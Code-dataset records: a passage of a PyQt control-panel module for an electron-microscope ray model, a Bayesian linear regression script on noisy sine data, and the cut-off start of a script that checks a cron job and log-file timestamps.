vbox.addStretch()\n\n self.box.setLayout(vbox)\n \n self.table = QGroupBox(name)\n self.xlabel_table = QLabel('X Position = ' + \"{:.2f}\".format(x))\n self.xlabel_table.setMinimumWidth(80)\n hbox = QHBoxLayout()\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.xlabel_table)\n \n self.ylabel_table = QLabel('Y Position = ' + \"{:.2f}\".format(y))\n self.ylabel_table.setMinimumWidth(80)\n hbox_labels.addWidget(self.ylabel_table)\n\n vbox = QVBoxLayout()\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n self.table.setLayout(vbox)\n\nclass DeflectorGui():\n '''GUI for the deflector component\n ''' \n def __init__(self, name, defx, defy):\n '''\n\n Parameters\n ----------\n name : str\n Name of component\n defx : float\n Initial X deflection of deflector\n defy : float\n Initial Y deflection of deflector\n '''\n self.box = QGroupBox(name)\n self.defxslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.defxslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.defxslider.setMinimum(-10)\n self.defxslider.setMaximum(10)\n self.defxslider.setValue(1)\n self.defxslider.setTickPosition(QSlider.TicksBelow)\n \n qdoublevalidator = QDoubleValidator()\n self.defxlineedit = QLineEdit(\"{:.4f}\".format(defx))\n self.defxlineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n self.defxlineedit.setValidator(qdoublevalidator)\n self.defxlineeditstep.setValidator(qdoublevalidator)\n \n self.defyslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.defyslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.defyslider.setMinimum(-10)\n self.defyslider.setMaximum(10)\n self.defyslider.setValue(1)\n self.defyslider.setTickPosition(QSlider.TicksBelow)\n self.defylineedit = QLineEdit(\"{:.4f}\".format(defy))\n self.defylineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n self.defylineedit.setValidator(qdoublevalidator)\n self.defylineeditstep.setValidator(qdoublevalidator)\n\n hbox = QHBoxLayout()\n hbox_lineedit = QHBoxLayout()\n hbox_lineedit.addWidget(QLabel('X Deflection = '))\n hbox_lineedit.addWidget(self.defxlineedit)\n hbox_lineedit.addWidget(QLabel('Slider Step X = '))\n hbox_lineedit.addWidget(self.defxlineeditstep)\n hbox_lineedit.addWidget(QLabel('Y Deflection = '))\n hbox_lineedit.addWidget(self.defylineedit)\n hbox_lineedit.addWidget(QLabel('Slider Step Y = '))\n hbox_lineedit.addWidget(self.defylineeditstep)\n hbox_slider = QHBoxLayout()\n hbox_slider.addWidget(self.defxslider)\n hbox_slider.addWidget(self.defyslider)\n\n vbox = QVBoxLayout()\n vbox.addLayout(hbox_lineedit)\n vbox.addLayout(hbox_slider)\n vbox.addStretch()\n\n self.box.setLayout(vbox)\n \n self.table = QGroupBox(name)\n self.defxlabel_table = QLabel('X Deflection = ' + \"{:.2f}\".format(defx))\n self.defxlabel_table.setMinimumWidth(80)\n self.defylabel_table = QLabel('Y Deflection = ' + \"{:.2f}\".format(defy))\n self.defylabel_table.setMinimumWidth(80)\n hbox = QHBoxLayout()\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.defxlabel_table)\n hbox_labels.addWidget(self.defylabel_table)\n \n vbox = QVBoxLayout()\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n self.table.setLayout(vbox)\n\n\nclass DoubleDeflectorGui():\n '''GUI for the double deflector component\n ''' \n def __init__(self, name, updefx, updefy, lowdefx, lowdefy):\n '''\n\n Parameters\n ----------\n name : str\n Name of component\n updefx : float\n Initial X deflection of upper deflector\n updefy : float\n Initial Y deflection of upper deflector\n lowdefx : float\n Initial X deflection of lower deflector\n lowdefy : float\n Initial Y deflection of lower deflector\n ''' \n self.box = QGroupBox(name)\n \n self.updefxslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.updefxslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.updefxslider.setMinimum(-10)\n self.updefxslider.setMaximum(10)\n self.updefxslider.setValue(1)\n self.updefxslider.setTickPosition(QSlider.TicksBelow)\n self.updefxlineedit = QLineEdit(\"{:.4f}\".format(updefx))\n self.updefxlineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n \n qdoublevalidator = QDoubleValidator()\n self.updefxlineedit.setValidator(qdoublevalidator)\n self.updefxlineeditstep.setValidator(qdoublevalidator)\n \n self.updefyslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.updefyslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.updefyslider.setMinimum(-10)\n self.updefyslider.setMaximum(10)\n self.updefyslider.setValue(1)\n self.updefyslider.setTickPosition(QSlider.TicksBelow)\n self.updefylineedit = QLineEdit(\"{:.4f}\".format(updefy))\n self.updefylineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n self.updefylineedit.setValidator(qdoublevalidator)\n self.updefylineeditstep.setValidator(qdoublevalidator)\n \n hbox = QHBoxLayout()\n hbox_lineedit = QHBoxLayout()\n hbox_lineedit.addWidget(QLabel('Upper X Deflection = '))\n hbox_lineedit.addWidget(self.updefxlineedit)\n hbox_lineedit.addWidget(QLabel('Slider Step Upper X = '))\n hbox_lineedit.addWidget(self.updefxlineeditstep)\n hbox_lineedit.addWidget(QLabel('Upper Y Deflection = '))\n hbox_lineedit.addWidget(self.updefylineedit)\n hbox_lineedit.addWidget(QLabel('Slider Step Upper Y = '))\n hbox_lineedit.addWidget(self.updefylineeditstep)\n \n hbox_slider = QHBoxLayout()\n hbox_slider.addWidget(self.updefxslider)\n hbox_slider.addWidget(self.updefyslider)\n \n vbox = QVBoxLayout()\n vbox.addLayout(hbox_lineedit)\n vbox.addLayout(hbox_slider)\n vbox.addStretch()\n \n self.lowdefxslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.lowdefxslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.lowdefxslider.setMinimum(-10)\n self.lowdefxslider.setMaximum(10)\n self.lowdefxslider.setValue(1)\n self.lowdefxslider.setTickPosition(QSlider.TicksBelow)\n self.lowdefxlineedit = QLineEdit(\"{:.4f}\".format(lowdefx))\n self.lowdefxlineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n self.lowdefxlineedit.setValidator(qdoublevalidator)\n self.lowdefxlineeditstep.setValidator(qdoublevalidator)\n \n self.lowdefyslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.lowdefyslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.lowdefyslider.setMinimum(-10)\n self.lowdefyslider.setMaximum(10)\n self.lowdefyslider.setValue(1)\n self.lowdefyslider.setTickPosition(QSlider.TicksBelow)\n self.lowdefylineedit = QLineEdit(\"{:.4f}\".format(lowdefy))\n self.lowdefylineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n self.lowdefylineedit.setValidator(qdoublevalidator)\n self.lowdefylineeditstep.setValidator(qdoublevalidator)\n \n hbox = QHBoxLayout()\n hbox_lineedit = QHBoxLayout()\n hbox_lineedit.addWidget(QLabel('Lower X Deflection = '))\n hbox_lineedit.addWidget(self.lowdefxlineedit)\n hbox_lineedit.addWidget(QLabel('Slider Step Lower X = '))\n hbox_lineedit.addWidget(self.lowdefxlineeditstep)\n hbox_lineedit.addWidget(QLabel('Lower Y Deflection = '))\n hbox_lineedit.addWidget(self.lowdefylineedit)\n hbox_lineedit.addWidget(QLabel('Slider Step Lower Y = '))\n hbox_lineedit.addWidget(self.lowdefylineeditstep)\n \n hbox_slider = QHBoxLayout()\n hbox_slider.addWidget(self.lowdefxslider)\n hbox_slider.addWidget(self.lowdefyslider)\n \n vbox.addLayout(hbox_lineedit)\n vbox.addLayout(hbox_slider)\n vbox.addStretch()\n\n self.xbuttonwobble = QCheckBox(\"Wobble Upper Deflector X\")\n self.defxwobblefreqlineedit = QLineEdit(\"{:.4f}\".format(1))\n self.defxwobbleamplineedit = QLineEdit(\"{:.4f}\".format(0.5))\n self.defxratiolabel = QLabel('Deflector X Response Ratio = ')\n self.defxratiolineedit = QLineEdit(\"{:.4f}\".format(0.0))\n self.defxratiolineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n \n self.defxratiolineedit.setValidator(qdoublevalidator)\n self.defxratiolineeditstep.setValidator(qdoublevalidator)\n \n self.defxratioslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.defxratioslider.setMinimum(-10)\n self.defxratioslider.setMaximum(10)\n self.defxratioslider.setValue(1)\n self.defxratioslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.defxratioslider.setTickPosition(QSlider.TicksBelow)\n\n hbox = QHBoxLayout()\n hbox.addWidget(self.xbuttonwobble)\n hbox.addWidget(QLabel('Wobble X Frequency'))\n hbox.addWidget(self.defxwobblefreqlineedit)\n hbox.addWidget(QLabel('Wobble X Amplitude'))\n hbox.addWidget(self.defxwobbleamplineedit)\n vbox.addLayout(hbox)\n \n hbox = QHBoxLayout()\n hbox.addWidget(self.defxratiolabel)\n hbox.addWidget(self.defxratiolineedit)\n hbox.addWidget(QLabel('Def Ratio X Response Slider Step = '))\n hbox.addWidget(self.defxratiolineeditstep)\n vbox.addLayout(hbox)\n \n hbox = QHBoxLayout()\n hbox.addWidget(self.defxratioslider)\n vbox.addLayout(hbox)\n\n self.ybuttonwobble = QCheckBox(\"Wobble Upper Deflector Y\")\n self.defywobblefreqlineedit = QLineEdit(\"{:.4f}\".format(1))\n self.defywobbleamplineedit = QLineEdit(\"{:.4f}\".format(0.5))\n self.defyratiolabel = QLabel('Deflector Y Response Ratio = ')\n self.defyratiolineedit = QLineEdit(\"{:.4f}\".format(0.0))\n self.defyratiolineeditstep = QLineEdit(\"{:.4f}\".format(0.1))\n self.defyratiolineedit.setValidator(qdoublevalidator)\n self.defyratiolineeditstep.setValidator(qdoublevalidator)\n \n self.defyratioslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.defyratioslider.setMinimum(-10)\n self.defyratioslider.setMaximum(10)\n self.defyratioslider.setValue(1)\n self.defyratioslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.defyratioslider.setTickPosition(QSlider.TicksBelow)\n \n self.usedefratio = QCheckBox(\"Use Def Ratio\")\n \n hbox = QHBoxLayout()\n hbox.addWidget(self.ybuttonwobble)\n hbox.addWidget(QLabel('Wobble Y Frequency'))\n hbox.addWidget(self.defywobblefreqlineedit)\n hbox.addWidget(QLabel('Wobble Y Amplitude'))\n hbox.addWidget(self.defywobbleamplineedit)\n vbox.addLayout(hbox)\n \n hbox = QHBoxLayout()\n hbox.addWidget(self.defyratiolabel)\n hbox.addWidget(self.defyratiolineedit)\n hbox.addWidget(QLabel('Def Ratio Y Response Slider Step = '))\n hbox.addWidget(self.defyratiolineeditstep)\n vbox.addLayout(hbox)\n \n hbox = QHBoxLayout()\n hbox.addWidget(self.defyratioslider)\n vbox.addLayout(hbox)\n hbox = QHBoxLayout()\n hbox.addWidget(self.usedefratio)\n vbox.addLayout(hbox)\n \n self.box.setLayout(vbox)\n\n hbox = QHBoxLayout()\n self.table = QGroupBox(name)\n self.updefxlabel_table = QLabel('Upper X Deflection = ' + \"{:.2f}\".format(updefx))\n self.updefxlabel_table.setMinimumWidth(80)\n self.updefylabel_table = QLabel('Upper Y Deflection = ' + \"{:.2f}\".format(updefy))\n self.updefylabel_table.setMinimumWidth(80)\n self.lowdefxlabel_table = QLabel('Lower X Deflection = ' + \"{:.2f}\".format(updefx))\n self.lowdefxlabel_table.setMinimumWidth(80)\n self.lowdefylabel_table = QLabel('Lower Y Deflection = ' + \"{:.2f}\".format(updefy))\n self.lowdefylabel_table.setMinimumWidth(80)\n self.defyratiolabel_table = QLabel('Y Deflector Ratio = ' + \"{:.2f}\".format(1))\n self.defxratiolabel_table = QLabel('X Deflector Ratio = ' + \"{:.2f}\".format(1))\n \n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.updefxlabel_table)\n hbox_labels.addWidget(self.updefylabel_table)\n hbox_labels.addWidget(self.lowdefxlabel_table)\n hbox_labels.addWidget(self.lowdefylabel_table)\n hbox_labels.addWidget(self.defxratiolabel_table)\n hbox_labels.addWidget(self.defyratiolabel_table)\n\n vbox = QVBoxLayout()\n vbox.addLayout(hbox_labels)\n self.table.setLayout(vbox)\n\n\nclass BiprismGui():\n '''GUI for the biprism component\n ''' \n def __init__(self, name, deflection, theta):\n '''\n\n Parameters\n ----------\n name : str\n Name of component\n deflection : float\n Deflection angle in Slope units\n theta : int\n Angle of biprism. Determines if the biprism creates deflects in the x or y direction.\n Two options: 0 or 1. 0 for 0 degrees, 1 for 90 degree rotation. \n\n '''\n self.box = QGroupBox(name)\n self.defslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.defslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.defslider.setMinimum(-2000)\n self.defslider.setMaximum(2000)\n self.defslider.setValue(int(round(deflection*1000)))\n self.defslider.setTickPosition(QSlider.TicksBelow)\n\n self.deflabel = QLabel('Biprism Deflection = ' + \"{:.2f}\".format(deflection))\n self.deflabel.setMinimumWidth(80)\n\n vbox = QVBoxLayout()\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.deflabel)\n\n hbox = QHBoxLayout()\n hbox.addWidget(self.defslider)\n\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n\n self.rotslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.rotslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.rotslider.setMinimum(0)\n self.rotslider.setMaximum(1)\n self.rotslider.setValue(theta)\n self.rotslider.setTickPosition(QSlider.TicksBelow)\n\n self.rotlabel = QLabel('Rotation (Radians) = ' + \"{:.2f}\".format(theta))\n self.rotlabel.setMinimumWidth(80)\n\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.rotlabel)\n\n hbox = QHBoxLayout()\n hbox.addWidget(self.rotslider)\n\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n\n vbox.addStretch()\n\n self.box.setLayout(vbox)\n \n self.table = QGroupBox(name)\n self.deflabel_table = QLabel('Biprism Deflection = ' + \"{:.2f}\".format(deflection))\n self.rotlabel_table = QLabel('Rotation (Radians) = ' + \"{:.2f}\".format(theta))\n \n hbox = QHBoxLayout()\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.deflabel_table)\n hbox_labels.addWidget(self.rotlabel_table)\n \n vbox = QVBoxLayout()\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n self.table.setLayout(vbox)\n\n# \nclass ModelGui():\n '''Overall GUI of the model\n ''' \n def __init__(self, num_rays, beam_type, gun_beam_semi_angle, beam_tilt_x, beam_tilt_y, beam_radius):\n '''\n\n Parameters\n ----------\n num_rays : int\n Number of rays in the model\n beam_type : str\n Type of initial beam: Axial, paralell of point. \n gun_beam_semi_angle : float\n Semi angle of the beam \n beam_tilt_x : float\n Initial x tilt of the beam in radians\n beam_tilt_y : float\n Initial y tilt of the beam in radians\n '''\n self.box = QGroupBox('Model Settings')\n self.rayslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.rayslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.rayslider.setMinimum(4)\n self.rayslider.setMaximum(15)\n self.rayslider.setValue(int(np.log2(num_rays)))\n self.rayslider.setTickPosition(QSlider.TicksBelow)\n\n self.raylabel = QLabel(str(num_rays))\n self.raylabel.setMinimumWidth(80)\n self.modelraylabel = QLabel('Number of Rays')\n\n vbox = QVBoxLayout()\n vbox.addStretch()\n\n hbox = QHBoxLayout()\n hbox.addWidget(self.rayslider)\n hbox.addSpacing(15)\n hbox.addWidget(self.raylabel)\n\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.modelraylabel)\n hbox_labels.addStretch()\n\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n\n self.beamangleslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.beamangleslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.beamangleslider.setMinimum(0)\n self.beamangleslider.setMaximum(157)\n self.beamangleslider.setValue(int(round(gun_beam_semi_angle, 2)*100))\n self.beamangleslider.setTickPosition(QSlider.TicksBelow)\n\n self.beamanglelabel = QLabel(str(round(gun_beam_semi_angle, 2)))\n self.beamanglelabel.setMinimumWidth(80)\n self.modelbeamanglelabel = QLabel('Axial/Paralell Beam Semi Angle')\n\n hbox = QHBoxLayout()\n hbox.addWidget(self.beamangleslider)\n hbox.addSpacing(15)\n hbox.addWidget(self.beamanglelabel)\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.modelbeamanglelabel)\n hbox_labels.addStretch()\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n\n self.beamwidthslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.beamwidthslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.beamwidthslider.setMinimum(-100)\n self.beamwidthslider.setMaximum(99)\n self.beamwidthslider.setValue(1)\n self.beamwidthslider.setTickPosition(QSlider.TicksBelow)\n\n self.beamwidthlabel = QLabel('0')\n self.beamwidthlabel.setMinimumWidth(80)\n self.modelbeamwidthlabel = QLabel('Paralell Beam Width')\n\n hbox = QHBoxLayout()\n hbox.addWidget(self.beamwidthslider)\n hbox.addSpacing(15)\n hbox.addWidget(self.beamwidthlabel)\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.modelbeamwidthlabel)\n hbox_labels.addStretch()\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n\n self.checkBoxAxial = QCheckBox(\"Axial Beam\")\n\n self.checkBoxPoint = QCheckBox(\"Point Beam\")\n\n self.checkBoxParalell = QCheckBox(\"Paralell Beam\")\n\n self.checkBoxParalell.stateChanged.connect(\n partial(self.uncheck, self.checkBoxParalell))\n self.checkBoxPoint.stateChanged.connect(\n partial(self.uncheck, self.checkBoxPoint))\n self.checkBoxAxial.stateChanged.connect(\n partial(self.uncheck, self.checkBoxAxial))\n\n hbox.addWidget(self.checkBoxAxial)\n hbox.addWidget(self.checkBoxPoint)\n hbox.addWidget(self.checkBoxParalell)\n\n if beam_type == 'axial':\n self.checkBoxAxial.setChecked(True)\n elif beam_type == 'paralell':\n self.checkBoxParalell.setChecked(True)\n elif beam_type == 'point':\n self.checkBoxPoint.setChecked(True)\n\n hbox = QHBoxLayout()\n hbox_labels = QHBoxLayout()\n self.anglelabel = QLabel('Beam Tilt Offset')\n hbox_labels.addWidget(self.anglelabel)\n\n self.xanglelabel = QLabel(\n 'Beam Tilt X (Radians) = ' + \"{:.3f}\".format(beam_tilt_x))\n self.xangleslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.xangleslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.xangleslider.setMinimum(-200)\n self.xangleslider.setMaximum(200)\n self.xangleslider.setValue(0)\n self.xangleslider.setTickPosition(QSlider.TicksBelow)\n\n self.yanglelabel = QLabel(\n 'Beam Tilt Y (Radians) = ' + \"{:.3f}\".format(beam_tilt_y))\n self.yangleslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.yangleslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.yangleslider.setMinimum(-200)\n self.yangleslider.setMaximum(200)\n self.yangleslider.setValue(0)\n self.yangleslider.setTickPosition(QSlider.TicksBelow)\n\n hbox.addWidget(self.xangleslider)\n hbox.addWidget(self.xanglelabel)\n\n hbox.addWidget(self.yangleslider)\n hbox.addWidget(self.yanglelabel)\n\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n\n self.view_label = QLabel('Set Camera View')\n self.init_button = QPushButton('Initial View')\n self.x_button = QPushButton('X View')\n self.y_button = QPushButton('Y View')\n\n hbox_label = QHBoxLayout()\n hbox_label.addWidget(self.view_label)\n hbox_push_buttons = QHBoxLayout()\n hbox_push_buttons.addWidget(self.init_button)\n hbox_push_buttons.addSpacing(15)\n hbox_push_buttons.addWidget(self.x_button)\n hbox_push_buttons.addSpacing(15)\n hbox_push_buttons.addWidget(self.y_button)\n\n vbox.addLayout(hbox_label)\n vbox.addLayout(hbox_push_buttons)\n\n self.box.setLayout(vbox)\n\n def uncheck(self, btn):\n '''Determines which button is checked, and unchecks others\n\n Parameters\n ----------\n btn : Pyqt5 Button\n '''\n # checking if state is checked\n if btn.isChecked() == True:\n\n # if first check box is selected\n if btn == self.checkBoxAxial:\n\n # making other check box to uncheck\n self.checkBoxParalell.setChecked(False)\n self.checkBoxPoint.setChecked(False)\n\n # if second check box is selected\n elif btn == self.checkBoxParalell:\n\n # making other check box to uncheck\n self.checkBoxAxial.setChecked(False)\n self.checkBoxPoint.setChecked(False)\n\n # if third check box is selected\n elif btn == self.checkBoxPoint:\n\n # making other check box to uncheck\n self.checkBoxAxial.setChecked(False)\n self.checkBoxParalell.setChecked(False)\n\n\nclass ApertureGui():\n '''GUI for the aperture component\n ''' \n def __init__(self, name, min_radius, max_radius, inner_radius, x, y):\n '''\n\n Parameters\n ----------\n name : str\n Name of component\n min_radius : float\n Minimum radius of the aperture\n max_radius : float\n Max radius of the aperture\n inner_radius : float\n Initial inner radius of the aperture\n x : float\n X position of component\n y : float\n y position of component\n '''\n self.box = QGroupBox(name)\n self.radiusslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.radiusslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.radiusslider.setMinimum(int(round(1)))\n self.radiusslider.setMaximum(int(round(max_radius*1000)))\n self.radiusslider.setValue(int(round(inner_radius*1000)))\n self.radiusslider.setTickPosition(QSlider.TicksBelow)\n\n self.radiuslabel = QLabel('Aperture Radius = ' +\n \"{:.2f}\".format(inner_radius))\n self.radiuslabel.setMinimumWidth(80)\n\n vbox = QVBoxLayout()\n vbox.addStretch()\n\n hbox = QHBoxLayout()\n hbox.addWidget(self.radiusslider)\n\n hbox_label = QHBoxLayout()\n hbox_label.addWidget(self.radiuslabel)\n\n vbox.addLayout(hbox_label)\n vbox.addLayout(hbox)\n\n self.xslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.xslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.xslider.setMinimum(-100)\n self.xslider.setMaximum(100)\n self.xslider.setValue(int(round(x*1e2)))\n self.xslider.setTickPosition(QSlider.TicksBelow)\n\n self.xlabel = QLabel('X Position = ' + \"{:.2f}\".format(x))\n self.xlabel.setMinimumWidth(80)\n\n hbox = QHBoxLayout()\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.xlabel)\n hbox.addSpacing(10)\n hbox.addWidget(self.xslider)\n\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n\n self.yslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.yslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.yslider.setMinimum(-100)\n self.yslider.setMaximum(100)\n self.yslider.setValue(int(round(y*1e2)))\n self.yslider.setTickPosition(QSlider.TicksBelow)\n\n self.ylabel = QLabel('Y Position = ' + \"{:.2f}\".format(y))\n self.ylabel.setMinimumWidth(80)\n\n hbox = QHBoxLayout()\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.ylabel)\n hbox.addSpacing(10)\n hbox.addWidget(self.yslider)\n\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n\n vbox.addStretch()\n\n self.box.setLayout(vbox)\n \n self.table = QGroupBox(name)\n self.radiuslabel_table = QLabel('Aperture Radius = ' + \"{:.2f}\".format(inner_radius))\n self.xlabel_table = QLabel('X Position = ' + \"{:.2f}\".format(x))\n self.ylabel_table = QLabel('Y Position = ' + \"{:.2f}\".format(y))\n \n hbox = QHBoxLayout()\n hbox_labels = QHBoxLayout()\n hbox_labels.addWidget(self.xlabel_table)\n hbox_labels.addWidget(self.ylabel_table)\n hbox_labels.addWidget(self.radiuslabel_table)\n\n vbox = QVBoxLayout()\n vbox.addLayout(hbox_labels)\n vbox.addLayout(hbox)\n self.table.setLayout(vbox)\n \nclass ExperimentGui():\n '''GUI for the aperture component\n ''' \n def __init__(self):\n '''\n\n Parameters\n ----------\n name : str\n Name of component\n min_radius : float\n Minimum radius of the aperture\n max_radius : float\n Max radius of the aperture\n inner_radius : float\n Initial inner radius of the aperture\n x : float\n X position of component\n y : float\n y position of component\n '''\n self.box = QGroupBox('Experiment')\n self.scanpixelsslider = QSlider(QtCore.Qt.Orientation.Horizontal)\n self.scanpixelsslider.setTickPosition(QSlider.TickPosition.TicksBelow)\n self.scanpixelsslider.setMinimum(2)\n self.scanpixelsslider.setMaximum(8)\n self.scanpixelsslider.setValue(256)\n \n self.scanpixelslabel = QLabel('Scan pixels = ' + str(int(self.scanpixelsslider.value())))\n self.scanpixelslabel.setMinimumWidth(80)\n \n self.overfocuslabel = QLabel('Overfocus = Not Set')\n self.overfocuslabel.setMinimumWidth(80)\n \n self.cameralengthlabel = QLabel('Camera length = Not Set')\n self.cameralengthlabel.setMinimumWidth(80)\n \n self.semiconvlabel = QLabel('Semi conv = Not Set')\n self.semiconvlabel.setMinimumWidth(80)\n \n self.scanpixelsizelabel = QLabel('Scan pixel size = Not Set')\n self.scanpixelsizelabel.setMinimumWidth(80)\n\n vbox = QVBoxLayout()\n vbox.addStretch()\n\n hbox = QHBoxLayout()\n hbox.addWidget(self.scanpixelsslider)\n hbox.addSpacing(15)\n hbox.addWidget(self.scanpixelslabel)\n hbox.addSpacing(15)\n hbox.addWidget(self.overfocuslabel)\n hbox.addSpacing(15)\n hbox.addWidget(self.semiconvlabel)\n hbox.addSpacing(15)\n hbox.addWidget(self.scanpixelsizelabel)\n hbox.addSpacing(15)\n hbox.addWidget(self.cameralengthlabel)\n \n \n vbox.addLayout(hbox)\n \n self.FOURDSTEM_experiment_button = QPushButton('Run 4D STEM Experiment')\n \n hbox_push_buttons = QHBoxLayout()\n hbox_push_buttons.addWidget(self.FOURDSTEM_experiment_button)\n vbox.addLayout(hbox_push_buttons)\n\n self.box.setLayout(vbox)\n\n","repo_name":"AMCLab/TemGymBasic","sub_path":"src/temgymbasic/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":37672,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"31416794359","text":"import numpy as np\nfrom numpy.linalg import inv, norm\nimport matplotlib.pyplot as plt\n\n\n# Define the polynomial model\ndef polynomial_model(M, x):\n polynomial_terms = []\n for i in range(M+1):\n polynomial_terms.append(np.array(x)**i)\n return polynomial_terms\n\n\n# Define Sine function\ndef sinusoidal(x):\n return np.sin(2 * np.pi * x)\n\n\n# Function for generating training data , where y_train = y_true + gaussian noise\ndef generate_toy_data(sample_size, std):\n x = np.linspace(0, 1, sample_size)\n y = sinusoidal(x) + np.random.normal(scale=std, size=x.shape)\n return x, y\n\n# Function that predicts m and s^2\ndef bayesian_prediction(a, b, Phi_test, Phi_train, y_train):\n Sigma = np.linalg.inv(a * np.eye(M + 1) + b * Phi_train.T @ Phi_train)\n m = b * Phi_test @ Sigma @ Phi_train.T @ y_train\n sigma = 1 / b + Phi_test @ Sigma @ Phi_test.T\n var = np.diag(sigma)\n\n return m, var\n\n\n# Number of training data points\nN = 10\n\n# Degree of polynomial for φ(x)\nM = 9\n\n# Gaussian noise\nm_noise = 0\nbeta = 11.1\ns_noise = 1/beta\n\n# Prior parameter\nalpha = 0.0005\n\n\n# Generate train data\nx_train, y_train = generate_toy_data(sample_size=N, std=s_noise)\n\n# Generate Φ(x)\nPhi_train = []\nfor i in range(N):\n Phi_train.append(polynomial_model(M, x_train[i]))\nPhi_train = np.array(Phi_train)\n\n# Generate test data\nx_test = np.linspace(0, 1, 1000)\nPhi_test = np.array([polynomial_model(M=M, x=x) for x in x_test])\n\n# Calculate the true and the predicted value\nt = sinusoidal(x_test)\nm, var = bayesian_prediction(a=alpha, b=beta, Phi_test=Phi_test, Phi_train=Phi_train, y_train=y_train)\n\n\nplt.figure()\nplt.scatter(x_train, y_train, facecolor=\"none\", edgecolor=\"mediumseagreen\", s=50, label=\"Training data\")\nplt.plot(x_test, t, color='steelblue', label='True Model')\nplt.plot(x_test, m, color='firebrick', label='Bayesian Linear Regression')\nplt.fill_between(x_test, m - var, m + var, alpha=0.2, color='firebrick', label='Variance')\nplt.xlabel('$x$')\nplt.xlim(-0.02, 1.01)\nplt.ylabel('$y$')\nplt.title('Bayesian Linear Regression vs True Model')\nplt.legend()\nplt.savefig('./output/ex5/bayesian_approach.pdf')\n\n\n\n","repo_name":"aspav/DSIT","sub_path":"MLCB/Supervised Learning/ex_5.py","file_name":"ex_5.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"8711144583","text":"import subprocess\nimport sys\nimport os\nimport time\nimport re\nimport chardet\n\ndef check_cron_job_exists():\n try:\n result = subprocess.run([\"sudo\", \"crontab\", \"-u\", \"gde\", \"-l\"], stdout=subprocess.PIPE, text=True)\n match = re.search(r'\\*/2 \\* \\* \\* \\*', result.stdout)\n return match is not None\n except subprocess.CalledProcessError:\n return False\n\ndef detect_encoding(file_path):\n with open(file_path, 'rb') as f:\n result = chardet.detect(f.read())\n return result['encoding']\n\ndef check_file_content(file_path):\n if not os.path.exists(file_path):\n return False\n\n encoding = detect_encoding(file_path)\n\n with open(file_path, 'r', encoding=encoding) as f:\n lines = f.readlines()\n\n if not lines:\n return False\n\n last_line = lines[-1].strip()\n\n # Check if the last line in the file contains a timestamp\n match = re.search(r'\\d{4}\\. \\w{3}\\. \\d{1,2}\\., \\w+, \\d{2}:\\d{2}:\\d{2} \\w+', last_line)\n return match is not None\n\nif __name__ == \"__main__\":\n file_path = 